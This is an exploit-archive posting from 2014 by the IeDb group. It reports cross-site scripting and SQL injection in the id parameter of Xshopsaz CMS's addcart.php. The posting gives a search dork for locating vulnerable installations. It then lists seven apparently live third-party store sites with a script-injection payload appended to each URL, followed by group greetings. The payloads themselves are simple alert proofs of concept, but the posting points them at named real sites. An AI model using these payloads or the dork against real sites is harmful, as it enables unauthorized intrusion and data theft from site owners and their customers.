Xshopsaz CMS Cross Site Scripting / SQL Injection

🗓️ 04 Sep 2014 00:00:00Reported by IeDbType

packetstorm🔗 packetstormsecurity.com👁 76 Views

Xshopsaz CMS Multiple Vulnerability, Cross Site Scripting and SQL Injectio

`#################################  
  
#  
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@  
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@   
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@   
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@   
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@  
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@  
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@  
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@  
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@  
#  
  
#####################################  
  
#####################################  
  
# Iranian Exploit DataBase  
  
# Xshopsaz CMS Multiple Vulnerability  
  
# Vendor site : http://www.xshopsaz.ir/  
  
# Dork : "???? ??? ???? ?? ??????? ?? ??????? ??? ???? ????? ???."  
  
# Author : IeDb  
  
# Site : Www.IeDb.Ir/acc - Www.IrIsT.Ir  
  
# Fb Page : https://www.facebook.com/iedb.ir  
  
#####################################  
  
Bug :  
  
http://www.site.com/addcart.php?action=add&id=1[xss][sql]  
  
  
Image : http://0up.ir/up8/guest/b-xshopsaz.jpg  
  
Dem0 :  
  
http://powermc.net/addcart.php?action=add&id=189"><script>alert(/Amir/)</script>  
http://sabastore.ir/addcart.php?action=add&id=189"><script>alert(/Amir/)</script>  
http://www.ouruni.ir/addcart.php?action=add&id=189"><script>alert(/Amir/)</script>  
http://www.azinic.net/addcart.php?action=add&id=189"><script>alert(/Amir/)</script>  
http://mci5.net/addcart.php?action=add&id=189"><script>alert(/Amir/)</script>  
http://mellatstore.com/addcart.php?action=add&id=189"><script>alert(/Amir/)</script>  
http://www.ebuy-internet.ir/addcart.php?action=add&id=189"><script>alert(/Amir/)</script>  
  
#####################################  
  
# Greats : Bl4ck M4n - ErfanMs - 4ntr4x - N20 - Bl4ck N3T - dr.koderz - Enddo - E1.Coders - Behnam Vanda  
  
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - 0x0ptim0us - 0Day  
  
# Security - ARTA - ARYABOD - Mr.Time - C0dex - Det3cT0r - yashar shahinzadeh - Khashayar   
  
# tootro20 - AmirMasoud And All Members In IeDb.Ir/acc  
  
#####################################  
  
# Archive Exploit = http://www.iedb.ir/exploits-1933.html  
  
#####################################  
`

04 Sep 2014 00:00Current

0.4Low risk

Vulners AI Score0.4